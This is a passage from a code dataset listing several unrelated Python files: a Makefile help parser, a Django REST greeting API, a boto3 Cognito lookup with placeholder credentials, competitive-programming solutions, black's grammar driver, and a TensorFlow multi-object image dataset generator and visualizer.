metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "515hikaru/make2help",
"score": 3
} |
#### File: make2help/make2help/make2help.py
```python
import re
def parse_makefile(lines):
"""
parse makefine lines.
"""
lines = [line for line in lines if line != '']
help_pattern = re.compile('(?<=^## ).+')
target_pattern = re.compile('.+(?=:)')
for num, line in enumerate(lines):
find_target = target_pattern.search(line)
if find_target:
target = find_target.group()
# except startswith '.', like .PHONY
if target.strip().startswith('.'):
continue
help_ = help_pattern.search(lines[num - 1])
if num != 0 and help_:
detail = help_.group()
else:
detail = ''
yield target, detail
def prepare_makefile_lines(makefile_path):
"""return makefile content"""
with open(makefile_path, 'r') as makefile:
lines = makefile.readlines()
return lines
def format_makehelp(target, detail):
"""
return "{target}:\t{detail}"
"""
return '{}:\t{}'.format(target, detail)
``` |
{
"source": "515hikaru/python-templates",
"score": 2
} |
#### File: python-templates/tests/test_fizzbuzz.py
```python
from python_template import fizzbuzz
def test_fizzbuzz():
"""
test for fizzbuzz func
"""
assert fizzbuzz(11) == "11"
assert fizzbuzz(12) == "fizz"
assert fizzbuzz(15) == "fizzbuzz"
assert fizzbuzz(20) == "buzz"
``` |
{
"source": "515hikaru-sandbox/django-restframework-sample",
"score": 2
} |
#### File: django-restframework-sample/app/views.py
```python
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.viewsets import ViewSet
from .serializer import GreetingSerializer
class GreetingViewset(ViewSet):
def list(self, request):
return Response({'message': 'Hello, World!'})
def create(self, request):
serializer = GreetingSerializer(data=request.data)
if not serializer.is_valid():
return Response({'message': 'What\'s your name?'})
name = serializer.data['name']
return Response({'message': f'Hello, {name}!'})
``` |
{
"source": "515hikaru-sandbox/example-unittest-with-boto3",
"score": 2
} |
#### File: 515hikaru-sandbox/example-unittest-with-boto3/main.py
```python
import os
import boto3
from botocore.exceptions import ClientError
os.environ['AWS_ACCESS_KEY_ID'] = 'DUMMY_VALUE'
os.environ['AWS_SECRET_ACCESS_KEY'] = 'DUMMY_VALUE'
os.environ['AWS_DEFAULT_REGION'] = 'ap-northeast-1'
def get_user(name: str) -> dict:
client = boto3.client('cognito-idp')
try:
user = client.admin_get_user(
UserPoolId='DUMMY_USER_POOL_ID',
Username=name,
)
except ClientError as error:
if error.response['Error']['Code'] == 'UserNotFoundException':
return None
raise
return user['UserAttributes']
``` |
{
"source": "515hikaru/solutions",
"score": 3
} |
#### File: abc/104/c_retry2.py
```python
from itertools import combinations
def exclude_combi_idx(combis, scores):
a = [score[1] for score in combis]
v = []
for score in scores:
if score[1] in a:
continue
v.append(score)
return v
def set_all_solve(combi):
current = 0
num = 0
for item in combi:
num += item[0]
current += item[2]
return num, current
def track_residue(num, score, current, target):
for i in range(num):
current += score
if current >= target:
return i + 1
return None
def main():
D, G = [int(c) for c in input().split()]
items = []
for idx in range(1, 1+D):
num, bonasu = [int(c) for c in input().split()]
items.append((idx * 100, num, bonasu))
scores = [(num, idx,idx * num + bonasu) for idx, num, bonasu in items]
max_prob = sum([num for num,_, _ in scores])
min_prob = max_prob
for i in range(0, D+1):
combis = list(combinations(scores, i))
# print('i = {}, combinations = {}'.format(i, combis))
for combi in combis:
s = 0
prob = 0
# print('combi = {}'.format(combi))
tmp, tmp2 = set_all_solve(combi)
prob += tmp
s += tmp2
# print('all solves num = {} score = {}'.format(prob, s))
if s >= G:
if prob < min_prob:
min_prob = prob
continue
else:
v = exclude_combi_idx(combi, scores)[-1] # 値が最大のもののみ必要
res = track_residue(v[0], v[1], s, G)
if res is None:
continue
if res + prob < min_prob:
# print('track solve: num = {}, score = {}'.format(res + prob, s))
min_prob = res + prob
print(min_prob)
if __name__ == '__main__':
main()
```
#### File: abc/106/C.py
```python
def main():
s = input()
k = int(input())
# あたまに '1' が並んでいるケース
ss = ''
for w in s:
if w == '1':
ss += w
else:
break
if len(ss) >= k:
print(1)
return
for w in s:
if w != '1':
print(w)
break
if __name__ == '__main__':
main()
```
#### File: abc/109/c.py
```python
def gcd(a,b):
if a < b:
a, b = b, a
if b == 0:
return a
return gcd(b, a %b)
def gcdlist(l):
if len(l) == 2:
return gcd(l[0], l[1])
f = l.pop()
s = l.pop()
m = gcd(f, s)
l.append(m)
return gcdlist(l)
def main():
n, x = map(int, input().split())
a = [int(v) for v in input().split(' ')]
a.append(x)
a.sort()
dis = [x2 - x1 for x1, x2 in zip(a, a[1:])]
max_ = 0
for i in range(n):
if len(dis) == 1:
max_ = dis[0]
break
try:
max_ = gcdlist(dis)
except:
max_ = 1
print(max_)
if __name__ == '__main__':
main()
```
#### File: abc/110/A.py
```python
def main():
s = [item for item in input().split()]
s.sort(reverse=True)
print(int(s[0]+s[1])+int(s[2]))
if __name__ == '__main__':
main()
``` |
{
"source": "515k4/black",
"score": 2
} |
#### File: blib2to3/pgen2/driver.py
```python
__author__ = "<NAME> <<EMAIL>>"
__all__ = ["Driver", "load_grammar"]
# Python imports
import io
import os
import logging
import pkgutil
import sys
from typing import (
Any,
IO,
Iterable,
List,
Optional,
Text,
Iterator,
Tuple,
TypeVar,
Generic,
Union,
)
from dataclasses import dataclass, field
# Pgen imports
from . import grammar, parse, token, tokenize, pgen
from logging import Logger
from blib2to3.pytree import _Convert, NL
from blib2to3.pgen2.grammar import Grammar
from contextlib import contextmanager
Path = Union[str, "os.PathLike[str]"]
@dataclass
class ReleaseRange:
start: int
end: Optional[int] = None
tokens: List[Any] = field(default_factory=list)
def lock(self) -> None:
total_eaten = len(self.tokens)
self.end = self.start + total_eaten
class TokenProxy:
def __init__(self, generator: Any) -> None:
self._tokens = generator
self._counter = 0
self._release_ranges: List[ReleaseRange] = []
@contextmanager
def release(self) -> Iterator["TokenProxy"]:
release_range = ReleaseRange(self._counter)
self._release_ranges.append(release_range)
try:
yield self
finally:
# Lock the last release range to the final position that
# has been eaten.
release_range.lock()
def eat(self, point: int) -> Any:
eaten_tokens = self._release_ranges[-1].tokens
if point < len(eaten_tokens):
return eaten_tokens[point]
else:
while point >= len(eaten_tokens):
token = next(self._tokens)
eaten_tokens.append(token)
return token
def __iter__(self) -> "TokenProxy":
return self
def __next__(self) -> Any:
# If the current position is already compromised (looked up)
# return the eaten token, if not just go further on the given
# token producer.
for release_range in self._release_ranges:
assert release_range.end is not None
start, end = release_range.start, release_range.end
if start <= self._counter < end:
token = release_range.tokens[self._counter - start]
break
else:
token = next(self._tokens)
self._counter += 1
return token
def can_advance(self, to: int) -> bool:
# Try to eat, fail if it can't. The eat operation is cached
# so there wont be any additional cost of eating here
try:
self.eat(to)
except StopIteration:
return False
else:
return True
class Driver(object):
def __init__(
self,
grammar: Grammar,
convert: Optional[_Convert] = None,
logger: Optional[Logger] = None,
) -> None:
self.grammar = grammar
if logger is None:
logger = logging.getLogger(__name__)
self.logger = logger
self.convert = convert
def parse_tokens(self, tokens: Iterable[Any], debug: bool = False) -> NL:
"""Parse a series of tokens and return the syntax tree."""
# XXX Move the prefix computation into a wrapper around tokenize.
proxy = TokenProxy(tokens)
p = parse.Parser(self.grammar, self.convert)
p.setup(proxy=proxy)
lineno = 1
column = 0
indent_columns = []
type = value = start = end = line_text = None
prefix = ""
for quintuple in proxy:
type, value, start, end, line_text = quintuple
if start != (lineno, column):
assert (lineno, column) <= start, ((lineno, column), start)
s_lineno, s_column = start
if lineno < s_lineno:
prefix += "\n" * (s_lineno - lineno)
lineno = s_lineno
column = 0
if column < s_column:
prefix += line_text[column:s_column]
column = s_column
if type in (tokenize.COMMENT, tokenize.NL):
prefix += value
lineno, column = end
if value.endswith("\n"):
lineno += 1
column = 0
continue
if type == token.OP:
type = grammar.opmap[value]
if debug:
self.logger.debug(
"%s %r (prefix=%r)", token.tok_name[type], value, prefix
)
if type == token.INDENT:
indent_columns.append(len(value))
_prefix = prefix + value
prefix = ""
value = ""
elif type == token.DEDENT:
_indent_col = indent_columns.pop()
prefix, _prefix = self._partially_consume_prefix(prefix, _indent_col)
if p.addtoken(type, value, (prefix, start)):
if debug:
self.logger.debug("Stop.")
break
prefix = ""
if type in {token.INDENT, token.DEDENT}:
prefix = _prefix
lineno, column = end
if value.endswith("\n"):
lineno += 1
column = 0
else:
# We never broke out -- EOF is too soon (how can this happen???)
assert start is not None
raise parse.ParseError("incomplete input", type, value, (prefix, start))
assert p.rootnode is not None
return p.rootnode
def parse_stream_raw(self, stream: IO[Text], debug: bool = False) -> NL:
"""Parse a stream and return the syntax tree."""
tokens = tokenize.generate_tokens(stream.readline, grammar=self.grammar)
return self.parse_tokens(tokens, debug)
def parse_stream(self, stream: IO[Text], debug: bool = False) -> NL:
"""Parse a stream and return the syntax tree."""
return self.parse_stream_raw(stream, debug)
def parse_file(
self, filename: Path, encoding: Optional[Text] = None, debug: bool = False
) -> NL:
"""Parse a file and return the syntax tree."""
with io.open(filename, "r", encoding=encoding) as stream:
return self.parse_stream(stream, debug)
def parse_string(self, text: Text, debug: bool = False) -> NL:
"""Parse a string and return the syntax tree."""
tokens = tokenize.generate_tokens(
io.StringIO(text).readline, grammar=self.grammar
)
return self.parse_tokens(tokens, debug)
def _partially_consume_prefix(self, prefix: Text, column: int) -> Tuple[Text, Text]:
lines: List[str] = []
current_line = ""
current_column = 0
wait_for_nl = False
for char in prefix:
current_line += char
if wait_for_nl:
if char == "\n":
if current_line.strip() and current_column < column:
res = "".join(lines)
return res, prefix[len(res) :]
lines.append(current_line)
current_line = ""
current_column = 0
wait_for_nl = False
elif char in " \t":
current_column += 1
elif char == "\n":
# unexpected empty line
current_column = 0
else:
# indent is finished
wait_for_nl = True
return "".join(lines), current_line
def _generate_pickle_name(gt: Path, cache_dir: Optional[Path] = None) -> Text:
head, tail = os.path.splitext(gt)
if tail == ".txt":
tail = ""
name = head + tail + ".".join(map(str, sys.version_info)) + ".pickle"
if cache_dir:
return os.path.join(cache_dir, os.path.basename(name))
else:
return name
def load_grammar(
gt: Text = "Grammar.txt",
gp: Optional[Text] = None,
save: bool = True,
force: bool = False,
logger: Optional[Logger] = None,
) -> Grammar:
"""Load the grammar (maybe from a pickle)."""
if logger is None:
logger = logging.getLogger(__name__)
gp = _generate_pickle_name(gt) if gp is None else gp
if force or not _newer(gp, gt):
logger.info("Generating grammar tables from %s", gt)
g: grammar.Grammar = pgen.generate_grammar(gt)
if save:
logger.info("Writing grammar tables to %s", gp)
try:
g.dump(gp)
except OSError as e:
logger.info("Writing failed: %s", e)
else:
g = grammar.Grammar()
g.load(gp)
return g
def _newer(a: Text, b: Text) -> bool:
"""Inquire whether file a was written since file b."""
if not os.path.exists(a):
return False
if not os.path.exists(b):
return True
return os.path.getmtime(a) >= os.path.getmtime(b)
def load_packaged_grammar(
package: str, grammar_source: Text, cache_dir: Optional[Path] = None
) -> grammar.Grammar:
"""Normally, loads a pickled grammar by doing
pkgutil.get_data(package, pickled_grammar)
where *pickled_grammar* is computed from *grammar_source* by adding the
Python version and using a ``.pickle`` extension.
However, if *grammar_source* is an extant file, load_grammar(grammar_source)
is called instead. This facilitates using a packaged grammar file when needed
but preserves load_grammar's automatic regeneration behavior when possible.
"""
if os.path.isfile(grammar_source):
gp = _generate_pickle_name(grammar_source, cache_dir) if cache_dir else None
return load_grammar(grammar_source, gp=gp)
pickled_name = _generate_pickle_name(os.path.basename(grammar_source), cache_dir)
data = pkgutil.get_data(package, pickled_name)
assert data is not None
g = grammar.Grammar()
g.loads(data)
return g
def main(*args: Text) -> bool:
"""Main program, when run as a script: produce grammar pickle files.
Calls load_grammar for each argument, a path to a grammar text file.
"""
if not args:
args = tuple(sys.argv[1:])
logging.basicConfig(level=logging.INFO, stream=sys.stdout, format="%(message)s")
for gt in args:
load_grammar(gt, save=True, force=True)
return True
if __name__ == "__main__":
sys.exit(int(not main()))
``` |
{
"source": "51616/split",
"score": 2
} |
#### File: split/spair/data.py
```python
import tensorflow as tf
import tensorflow_addons as tfa
import numpy as np
from random import randint, choice, shuffle
import os
from glob import glob
from PIL import Image
import math
from pathlib import Path
import matplotlib.pyplot as plt
def load_cub_masked():
train_images = np.load('data/cub_train_seg_14x14_pad_20_masked.npy')
test_images = np.load('data/cub_test_seg_14x14_pad_20_masked.npy')
return train_images, None, test_images, None
def calculateIntersection(a0, a1, b0, b1):
if a0 >= b0 and a1 <= b1: # Contained
intersection = a1 - a0
elif a0 < b0 and a1 > b1: # Contains
intersection = b1 - b0
elif a0 < b0 and a1 > b0: # Intersects right
intersection = a1 - b0
elif a1 > b1 and a0 < b1: # Intersects left
intersection = b1 - a0
else: # No intersection (either side)
intersection = 0
return intersection
def calculate_overlap(rand_x,rand_y,drawn_boxes):
# check if a new box is overlapped with drawn boxes more than 15% or not
for box in drawn_boxes:
x,y = box[0], box[1]
if calculateIntersection(rand_x,rand_x+14,x,x+14) * calculateIntersection(rand_y,rand_y+14,y,y+14) / 14**2 > 0.15:
return True
return False
class MultiCUB:
def __init__(self, data, reshape=True):
self.num_channel = data[0].shape[-1]
self.train_x = data[0]
self.train_y = data[1]
self.test_x = data[2]
self.test_y = data[3]
if reshape:
self.train_x = tf.image.resize(self.train_x,(14,14)).numpy() #[28,28] -> [14,14]
self.test_x = tf.image.resize(self.test_x,(14,14)).numpy()
self.bg_list = glob('data/kylberg/*.png')
#triad hard
self.train_colors_triad = [(195,135,255),(193,255,135),(255,165,135),(81,197,255),(255,229,81),(255,81,139)]
self.test_colors_triad = [(255,125,227),(125,255,184),(255,205,125)]
#easy colors
self.train_colors = [(100, 209, 72) , (209, 72, 100) , (209, 127, 72), (72, 129, 209) , (84, 184, 209), (209, 109, 84), (184, 209, 84), (109, 84, 209)]
self.test_colors = [(222, 222, 102),(100,100,219),(219,100,219),(100,219,100)]
def create_sample(self, n, width, height, bg = None, test=False):
canvas = np.zeros([width, height, self.num_channel], np.float32)
if bg=='solid_random':
brightness = randint(0,255)
r = randint(0,brightness)/255.
g = randint(0,brightness)/255.
b = randint(0,brightness)/255.
canvas[:,:,0] = r
canvas[:,:,1] = g
canvas[:,:,2] = b
elif bg=='solid_fixed':
color = choice(self.train_colors)
canvas[:,:,0] = color[0]/255.
canvas[:,:,1] = color[1]/255.
canvas[:,:,2] = color[2]/255.
elif bg=='unseen_solid_fixed':
color = choice(self.test_colors)
canvas[:,:,0] = color[0]/255.
canvas[:,:,1] = color[1]/255.
canvas[:,:,2] = color[2]/255.
elif bg=='white':
canvas[:,:,:] = np.ones_like(canvas)
elif bg=='texture':
img_name = np.random.choice(self.bg_list)
# print(img_name)
img = np.tile(np.array(Image.open(img_name))[:,:,np.newaxis]/255.,[1,1,3])
# print(img.shape)
canvas[:,:,:] = tf.image.resize(img, size=[width,height] )
if 'rot' in bg: #ckb_rot_6
temp_canvas = np.zeros([width*4, height*4, self.num_channel], np.float32)
if 'unseen' in bg:
shuffle(self.test_colors_triad)
colors = self.test_colors_triad[:2]
else:
shuffle(self.train_colors_triad)
colors = self.train_colors_triad[:2]
cell_size = int(bg[-1])
num_ckb = (height*4)//cell_size
for i in range(num_ckb):
for j in range(num_ckb):
temp_canvas[i*cell_size:(i+1)*cell_size,j*cell_size:(j+1)*cell_size,0] = colors[(i+j)%2][0]/255.
temp_canvas[i*cell_size:(i+1)*cell_size,j*cell_size:(j+1)*cell_size,1] = colors[(i+j)%2][1]/255.
temp_canvas[i*cell_size:(i+1)*cell_size,j*cell_size:(j+1)*cell_size,2] = colors[(i+j)%2][2]/255.
rot_image = tfa.image.rotate(tf.convert_to_tensor(temp_canvas),tf.constant(tf.random.uniform([],-1,1)*math.pi/2,dtype=tf.float32),interpolation='BILINEAR')
canvas = tf.image.central_crop(rot_image,0.25).numpy()
# plt.imshow(canvas)
# plt.show()
elif 'ckb' in bg:
if 'unseen' in bg:
shuffle(self.test_colors)
colors = self.test_colors[:2]
else:
shuffle(self.train_colors)
colors = self.train_colors[:2]
num_ckb = int(bg[0])
h = height//num_ckb; w = width//num_ckb
for i in range(num_ckb):
for j in range(num_ckb):
canvas[i*h:(i+1)*h,j*w:(j+1)*w,0] = colors[(i+j)%2][0]/255.
canvas[i*h:(i+1)*h,j*w:(j+1)*w,1] = colors[(i+j)%2][1]/255.
canvas[i*h:(i+1)*h,j*w:(j+1)*w,2] = colors[(i+j)%2][2]/255.
drawn_boxes = [] #x,y
for i in range(n):
rand_x = np.random.randint(0, width-14)
rand_y = np.random.randint(0, height-14)
while calculate_overlap(rand_x,rand_y,drawn_boxes):
rand_x = np.random.randint(0, width-14)
rand_y = np.random.randint(0, height-14)
drawn_boxes.append((rand_x,rand_y))
if not test:
rand_img = self.train_x[np.random.randint(0, self.train_x.shape[0])]
else:
rand_img = self.test_x[np.random.randint(0, self.test_x.shape[0])]
# rand_img = rand_img/255.
# print(rand_img)
# plt.imshow(rand_img)
# plt.show()
# rand_img = cv2.cvtColor(rand_img, cv2.COLOR_RGB2RGBA)
alpha_img = np.where(np.max(rand_img,axis=-1)>0,1.0,0.0)
rand_img = rand_img/255.
alpha_bg = 1.0 - alpha_img
alpha_img = alpha_img[:,:,np.newaxis]
alpha_bg = alpha_bg[:,:,np.newaxis]
# print('alpha_img.shape',alpha_img.shape)
# print('alpha_bg.shape',alpha_bg.shape)
canvas[rand_x:rand_x+14 , rand_y:rand_y+14] = alpha_img * rand_img + alpha_bg * canvas[rand_x:rand_x+14 , rand_y:rand_y+14]
# plt.imshow(canvas)
# plt.show()
# canvas[rand_x:rand_x+14 , rand_y:rand_y+14, :] = \
# np.clip(canvas[rand_x:rand_x+14 , rand_y:rand_y+14, :] + rand_img/255. , 0., 1.)
return canvas
def create_dataset(self, nsamples, digits, size,bg=None, test=False):
dataset_buffer = np.zeros([nsamples, size, size, self.num_channel])
if test:
count = np.zeros([nsamples])
for i in range(nsamples):
# print('sample no:',i)
rand_n = np.random.randint(digits[0], digits[1]+1)
# print('rand_n:',rand_n)
if test:
count[i] = rand_n
sample = self.create_sample(rand_n, size, size,bg, test)
dataset_buffer[i] = sample
if test:
return dataset_buffer.astype(np.float32), count
return dataset_buffer.astype(np.float32)
def random_crop(input_image,crop_size):
cropped_image = tf.image.random_crop(input_image, size=[crop_size, crop_size, input_image.shape[2]])
return cropped_image
def resize_random_crop(img,crop_size,resize_size):
return tf.image.resize(random_crop(img,crop_size),resize_size)
def _bytes_feature(value):
"""Returns a bytes_list from a string / byte."""
if isinstance(value, type(tf.constant(0))):
value = value.numpy() # BytesList won't unpack a string from an EagerTensor.
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_feature(value):
"""Returns a float_list from a float / double."""
return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))
def _int64_feature(value):
"""Returns an int64_list from a bool / enum / int / uint."""
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def serialize_images_and_labels(images,labels):
feature = {'image': _bytes_feature(tf.io.serialize_tensor(images)) ,'label': _int64_feature(labels)}
# Create an example protocol buffer
example = tf.train.Example(features=tf.train.Features(feature=feature))
return example.SerializeToString()
def tf_serialize_images_and_labels(images,labels):
tf_string = tf.py_function(
serialize_images_and_labels,
(images,labels), # pass these args to the above function.
tf.string) # the return type is `tf.string`.
return tf.reshape(tf_string, ()) # The result is a scalar
def parse_48_with_label(example_proto,size,channel):
feature_description = {
'image': tf.io.FixedLenFeature([], tf.string, default_value=''),
'label': tf.io.FixedLenFeature([], tf.int64, default_value=0)
}
example = tf.io.parse_single_example(example_proto, feature_description)
image = tf.io.parse_tensor(example['image'], out_type=tf.float32)
image = tf.reshape(image, [size,size,channel])
label = example['label']
return image,label
def create_cub_tfrec(name):
data = load_cub_masked()
multi_cub = MultiCUB(data,reshape=False)
if (name != 'cub_solid_fixed') and (name != 'cub_ckb_rot_6'):
print(name)
raise NotImplementedError('Undefined dataset')
# name = 'cub_solid_fixed' #'cub_ckb_rot_6', 'cub_16x16_ckb'
Path('data/multi_cub/').mkdir(parents=True, exist_ok=True)
numpy_test_unseen_dataset, count_test_unseen_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg= 'unseen_' + name[4:] , test=True) #16x16_ckb_unseen
test_dataset_unseen = tf.data.Dataset.from_tensor_slices((numpy_test_unseen_dataset,count_test_unseen_dataset))
test_dataset_unseen = test_dataset_unseen.map(tf_serialize_images_and_labels)
tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_unseen_' + name + '.tfrec')
tfrec.write(test_dataset_unseen)
numpy_train_dataset = multi_cub.create_dataset(100000,digits=[0,5],size=48,bg=name[4:])
numpy_test_dataset, count_test_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg=name[4:],test=True)
test_dataset = tf.data.Dataset.from_tensor_slices((numpy_test_dataset,count_test_dataset)).map(tf_serialize_images_and_labels)
tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_' + name + '.tfrec')
tfrec.write(test_dataset)
train_dataset = tf.data.Dataset.from_tensor_slices(numpy_train_dataset).map(tf.io.serialize_tensor)
tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/train_' + name + '.tfrec')
tfrec.write(train_dataset)
def get_cub_dataset(name,size=48,channel=3):
return get_cub_tfrec(name,size,channel)
def get_cub_tfrec(name,size=48,channel=3):
def parse(x):
result = tf.io.parse_tensor(x, out_type=tf.float32)
result = tf.reshape(result, [size, size, channel])
return result
train_path = 'data/multi_cub/train_' + name + '.tfrec'
test_path = 'data/multi_cub/test_' + name + '.tfrec'
test_unseen_path = 'data/multi_cub/test_unseen_' + name + '.tfrec'
if (not os.path.exists(train_path)) or (not os.path.exists(test_path)) or (not os.path.exists(test_unseen_path)):
print('TFRecord files not found, creating TFRecord files. This might take a while.')
create_cub_tfrec(name)
train_dataset = tf.data.TFRecordDataset(train_path).map(parse, num_parallel_calls=tf.data.experimental.AUTOTUNE)
test_dataset = tf.data.TFRecordDataset(test_path).map(lambda x: parse_48_with_label(x,size,channel), num_parallel_calls=tf.data.experimental.AUTOTUNE)
test_dataset_unseen = tf.data.TFRecordDataset(test_unseen_path).map(lambda x: parse_48_with_label(x,size,channel), num_parallel_calls=tf.data.experimental.AUTOTUNE)
return train_dataset, [test_dataset,test_dataset_unseen], [-1,size,size,channel], [-1,size,size,channel]
if __name__ == "__main__":
get_cub_tfrec(name='cub_ckb_rot_6')
# os.environ["CUDA_VISIBLE_DEVICES"]="-1"
# data = load_cub_masked()
# multi_cub = MultiCUB(data,reshape=False)
# name = 'cub_ckb_rot_6' #'cub_ckb_rot_6', 'cub_16x16_ckb'
# numpy_test_unseen_dataset, count_test_unseen_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg='unseen_cub_ckb_rot_6',test=True) #16x16_ckb_unseen
# for img in numpy_test_unseen_dataset:
# plt.imshow(img)
# plt.show()
# test_dataset_unseen = tf.data.Dataset.from_tensor_slices((numpy_test_unseen_dataset,count_test_unseen_dataset))
# test_dataset_unseen = test_dataset_unseen.map(tf_serialize_images_and_labels)
# tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_unseen_' + name + '.tfrec')
# tfrec.write(test_dataset_unseen)
# numpy_train_dataset = multi_cub.create_dataset(100000,digits=[0,5],size=48,bg='cub_ckb_rot_6')
# numpy_test_dataset, count_test_dataset = multi_cub.create_dataset(1000,digits=[0,5],size=48,bg='cub_ckb_rot_6',test=True)
# test_dataset = tf.data.Dataset.from_tensor_slices((numpy_test_dataset,count_test_dataset)).map(tf_serialize_images_and_labels)
# tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/test_' + name + '.tfrec')
# tfrec.write(test_dataset)
# train_dataset = tf.data.Dataset.from_tensor_slices(numpy_train_dataset).map(tf.io.serialize_tensor) # .map(random_crop)
# tfrec = tf.data.experimental.TFRecordWriter('data/multi_cub/train_' + name + '.tfrec')
# tfrec.write(train_dataset)
#######################################################################################################
# train_dataset, test_dataset, input_shape, test_size = get_cub_dataset('cub_solid_fixed_triad')
# for i, train_data in enumerate(train_dataset):
# print(train_data.shape)
# plt.imshow( tf.squeeze(train_data) ,cmap='gray')
# plt.show()
# if i ==3:
# break
# for i, (image,count) in enumerate(test_dataset[1]):
# print(image.shape)
# plt.imshow( tf.squeeze(image) ,cmap='gray')
# plt.show()
# if i ==3:
# break
```
#### File: split/spair/visualizer.py
```python
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
import tensorflow as tf
import warnings
# plt.tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
mpl.use('agg')
mpl.rcParams['figure.dpi'] = 300
mpl.rcParams['savefig.dpi'] = 300
warnings.filterwarnings("ignore", module="matplotlib")
def reconstruction_test(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
#Get a batch of test images
test_ds = test_dataset.take(n).shuffle(n,seed=1)
for test_data in test_ds:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid,
all_glimpses, obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *more_outputs) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
f, ax = plt.subplots(1, 3)
ax[0].set_xticks(np.arange(0, h*n, w))
ax[0].set_yticks(np.arange(0, h*(num_cells+2), w))
ax[1].set_xticks(np.arange(0, h*n, w))
ax[1].set_yticks(np.arange(0, h*(num_cells+2), w))
ax[2].set_xticks(np.arange(0, h*n, w))
ax[2].set_yticks(np.arange(0, h*(num_cells+2), w))
# num_channel = x_recon.shape[-1]
obj_recon = obj_full_recon_unnorm[:,:,:,:,:channel]
obj_alpha = obj_full_recon_unnorm[:,:,:,:,channel:]
z_depth = tf.reshape(z_depth, [n, num_cells, 1, 1, 1])
z_pres = tf.reshape(tf.round(tf.sigmoid(z_pres_logits)), [n, num_cells, 1, 1, 1])
canvas = np.empty((h*(num_cells+2), w*n, channel))
canvas_weighted = np.empty((h*(num_cells+2), w*n, channel))
canvas_weights_only = np.empty((h*(num_cells+2), w*n, channel)) # only weights of that part
for i in range(n):
canvas_weights_only[0:h,i*w:(i+1)*w, :] = canvas_weighted[0:h,i*w:(i+1)*w, :] = canvas[0:h,i*w:(i+1)*w, :] = images[i,:,:,:3]
canvas_weights_only[h:h*2, i*w:(i+1)*w, :] = canvas_weighted[h:h*2, i*w:(i+1)*w, :] = canvas[h:h*2, i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas[h*2:, i*w:(i+1)*w, :] = obj_recon[i].numpy().reshape((num_cells*h,w,channel))
canvas_weighted[h*2:, i*w:(i+1)*w, :] = (obj_recon[i]*obj_alpha[i]*z_pres[i]*tf.nn.sigmoid(-z_depth[i])).numpy().reshape((num_cells*h,w,channel))
canvas_weights_only[h*2:, i*w:(i+1)*w, 0] = (tf.ones(shape=obj_alpha[i].shape)*z_pres[i]).numpy().reshape((num_cells*h,w)) # *tf.nn.sigmoid(-z_depth[i])
ax[0].imshow(np.squeeze(canvas),cmap='gray')
ax[0].set_title('reconstruction')
ax[0].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[0].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[1].imshow(np.squeeze(canvas_weighted),cmap='gray')
ax[1].set_title('reconstruction weighted')
ax[1].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[1].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
ax[2].imshow(np.squeeze(canvas_weights_only),cmap='inferno')
ax[2].set_title('weights')
ax[2].grid(b=True, which='major', color='#ffffff', linestyle='-')
ax[2].tick_params(top=False, bottom=False, left=False, right=False, labelleft=False, labelbottom=False)
if filename is None:
plt.savefig(filepath + 'x_reconstrcution_test_spair.png')
else:
plt.savefig(filepath + 'x_reconstrcution_test' + filename + '.png', dpi=300)
# plt.close()
return plt
def reconstruction_bbox(model, test_dataset, filename = None, filepath = None, label=True, n = 10):
#Get a batch of test images
test_ds = test_dataset.take(n).shuffle(n,seed=1)
for test_data in test_ds:
if label:
images = test_data[0]
else:
images = test_data
x_test = images[:n]
break
h,w,channel = x_test.shape[1:4]
channel = min(3,channel)
(x_recon, z_what, z_what_mean, z_what_sigma, z_where, z_where_mean, z_where_sigma,
z_depth, z_depth_mean, z_depth_sigma, z_pres, z_pres_logits, z_pres_pre_sigmoid,
all_glimpses, obj_recon_unnorm, obj_recon_alpha, obj_full_recon_unnorm, obj_bbox_mask, *more_outputs) = model(x_test)
num_cells = z_where.shape[1]*z_where.shape[2]
# f, ax = plt.subplots(1, 1)
# ax[0].set_xticks(np.arange(0, h*n, w))
# ax[0].set_yticks(np.arange(0, h*(num_cells+2), w))
# num_channel = x_recon.shape[-1]
# print(obj_bbox_mask.numpy())
z_pres = tf.reshape(tf.round(tf.sigmoid(z_pres_logits)), [n, num_cells, 1])
colors = tf.constant([[1.0,1.0,1.0,1.0]])
obj_bbox_mask = obj_bbox_mask * z_pres
x_recon_w_bbox = tf.image.draw_bounding_boxes(x_recon,obj_bbox_mask,colors)
img_w_bbox = tf.image.draw_bounding_boxes(x_test[:,:,:,:3],obj_bbox_mask,colors)
canvas = np.empty((h*3, w*n, channel))
for i in range(n):
canvas[0:h,i*w:(i+1)*w, :] = images[i,:,:,:3]
canvas[h:h*2, i*w:(i+1)*w, :] = img_w_bbox[i].numpy().reshape((h,w,channel))
# canvas[h*2:h*3, i*w:(i+1)*w, :] = x_recon[i].numpy().reshape((h,w,channel))
canvas[h*2:h*3, i*w:(i+1)*w, :] = x_recon_w_bbox[i].numpy().reshape((h,w,channel))
# ax[0].imshow(np.squeeze(canvas),cmap='gray')
# ax[0].set_title('reconstruction')
